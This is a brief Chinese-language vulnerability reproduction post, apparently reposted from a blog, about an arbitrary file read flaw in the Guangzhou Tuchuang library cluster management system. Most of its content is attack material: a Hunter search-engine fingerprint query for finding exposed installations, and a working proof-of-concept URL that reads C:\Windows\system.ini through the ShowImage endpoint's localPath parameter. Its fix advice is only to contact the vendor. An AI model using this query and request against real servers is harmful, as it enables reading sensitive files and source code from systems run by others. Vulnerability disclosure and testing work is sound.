【漏洞复现】广州图创图书馆集群管理系统任意文件读取漏洞

发布时间:2024年01月17日

Nx01 产品简介

????????广州图创计算机软件开发有限公司是集产品研发、应用集成、客户服务为一体的高新技术企业,主要目标是为图书馆行业用户提供高质量的应用软件系统设计、集成和维护服务。

Nx02 漏洞描述

????????广州图创图书馆集群管理系统存在任意文件读取漏洞,攻击者可利用漏洞下载服务器的敏感信息,源码等。

Nx03 产品主页

hunter-query: web.body="/interlib/common/"

Nx04 漏洞复现

构造POC进行漏洞验证。

/interlib/report/ShowImage?localPath=C:\Windows\system.ini

Nx05 修复建议

建议联系软件厂商进行处理。

文章来源:https://blog.csdn.net/qq_37113223/article/details/135641089
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。